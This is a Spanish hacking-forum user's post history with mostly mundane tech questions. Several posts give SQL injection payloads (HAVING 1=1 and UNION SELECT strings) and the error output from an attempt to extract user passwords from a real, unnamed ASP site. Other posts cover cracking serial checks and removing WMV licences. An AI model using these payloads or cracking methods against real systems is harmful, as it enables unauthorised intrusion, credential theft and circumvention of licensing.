elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: [1] 2
1  Comunicaciones / Dispositivos Móviles (PDA's, Smartphones, Tablets) / Re: Configuraciones WAP/GPRS y MMS en: 3 Junio 2007, 06:01 am
Configuracion para Movistar Venezuela

punto de acceso: internet.movistar.ve
nombre del usuario: (en blanco)
contraseña: (en blanco)
tiempo de espera: Desactivado
ip gateway primaria: (en blanco)
puerto: 9001

Espero que les sea de utilidad.

Saludos a todos.

Nota: (en blanco) es no poner nada. Mejor lo aclaro  :D
2  Media / Juegos y Consolas / ¿ Existe Algun Emulador De Ps1 o Ps2 Para Xbox ? en: 23 Octubre 2005, 20:20 pm
Bueno despues de tanto buscar en google encontre emuladores para Atari, Super Nintendo, Nintendo 64, entre otro. Pero como todos deseo sacarle el mayor provecho a la consolo y decidi buscar emuladores para ps1 y ps2m hasta los momentos no he encontrado nada, si alguno de ustedes lo ha encontrado, ¿ me podria decir como se llama ?, Gracias por su atencion....

Saludos 
3  Seguridad Informática / Nivel Web / Re: Problemas con Inyeccion SQL en: 20 Enero 2005, 11:54 am
Trata usando estas:

'UNION SELECT MIN(heading),1,1,1 FROM newsengine WHERE heading >'a

'UNION SELECT DISTINCT * FROM newsengine WHERE heading >'a

'UNION SELECT * FROM newsengine WHERE heading >'a

'UNION SELECT MIN(heading),null,null,null FROM newsengine WHERE heading >'a

Saludos

4  Seguridad Informática / Nivel Web / Re: Problemas con Inyeccion SQL en: 17 Enero 2005, 12:22 pm
Gracias por contestar G4rBaG3, la verdad he buscado muchisimo en google.

El 'HAVING 1--1 lo utilice porque me dio curiocidad la estructura de la base de datos.

Mi idea no es incertar un registro en la base de datos sino sacar informacion de ella. El error de la pagina no lo encontre en la autentificacion del usuario, lo encontre en el buscador de usuarios.

Saludos
5  Media / Multimedia / Re: como puedo ver una pelicula avi? en: 3 Enero 2005, 03:14 am
Yo tengo un problema, la puedo ver en windows media player 10 pero no puedo ni adelantarla ni retrocederla. ¿la debo cambiar de formato?

Saludos
6  Media / Multimedia / Re: porfavor alguien q m aclare!!!!!! en: 30 Diciembre 2004, 12:16 pm
vito_jmr, por favor no escribas en mayusculas, pareciera que estas gritando.

El Nero tiene esa utilidad.

Ademas te podrias dedicar a buscar en la parte de multimedia, estoy casi seguro de que encontraras la solucion.

Saludos
7  Seguridad Informática / Nivel Web / Problemas con Inyeccion SQL en: 30 Diciembre 2004, 11:59 am
Se puede decir que encontre una pagina en asp la cual tiene un pequeño error en su pagina de busqueda, me doy cuenta del error ya que al inyectar

' HAVING 1=1--

Me desplega el siquiente error

Column 'usuarios.Ident' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

Bueno continue inyectando codigos para saber la estructura de la base de datos, despues de encontrar la estuctura completa decidi tratar de buscar los password de los usuarios iyectando este codigo

'UNION SELECT null,null,Password FROM usuarios WHERE usuarios.Nick='123456

Siendo 123456 un usuario valido y me desplego es siguiente error

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

Bueno continuo tratando e introdusco la siguiente iyeccion

'UNION SELECT * FROM usuarios WHERE Nick = '123456

Siendo 123456 un usuario valido y me desplego es siguiente error

The text, ntext, or image data type cannot be selected as DISTINCT.

Hasta el momento no se me ha ocurrido mas nada, si alguno de los lectores se le ocurre alguna idea estaria agradecido, mientras voy a continuar estudiando a ver si lo logro

Saludos y Feliz Navidad
8  Programación / Ingeniería Inversa / Re: [Una duda]Acerca de la comprobacion de los serial´s... en: 29 Diciembre 2004, 13:24 pm
El programa puede validar el codigo segun muchos metodos, los mas comunes son el codigo fijo, es decir, un mismo codigo para todos los usuarios; o un codigo variable que va a depender del nombre del usuario que introduscas.
Para el primer caso (codigo fijo) debe existir algun sitio en el codigo donde compara el introducido con el almacenado en el programa, suele estar un poco antes de la llamada al api de desplega el mensaje de codigo invalido.
En el segundo caso existen un conjunto de instruciones que generan el codigo de activacion, es decir, suman, restan, multiplican, dividen, cambian, etc. los valores exadecimales del nombre del usuario y lo combierten en el codigo, para encontrar el codigo valido tienes que estudiar la rutina que lo crea, al igual que en el caso anterior debe existir una instuccion o conjunto de instrucciones que validen el codigo, el truco esta en encontrarlas.

Saludos y feliz navidad.

NOTA: De existir algun error en este post por favor notificarlo !!
9  Informática / Software / Re: Problema Unidad DVD en: 28 Diciembre 2004, 02:06 am
La verdad nunca me ha pasado quemando algun dvd, pero si me sucedio con la quedadora de cd, y lo solucione limpiando el lector, intentalo a ver quisas encuentres la solucion.

Saludos, Feliz Navidad
10  Media / Multimedia / Licencias En WMV en: 26 Diciembre 2004, 13:02 pm
Segun tengo entendido las licencias de los videos en formate wmv son script que se le agregan a el video. Existe alguna forma de poder editar, ver o en su defecto eliminar dichos script para poder ver el video aunque caduque la licencia??
De poderce hacer me podian dar una orientacion....


Saludos y Feliz Navidad
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines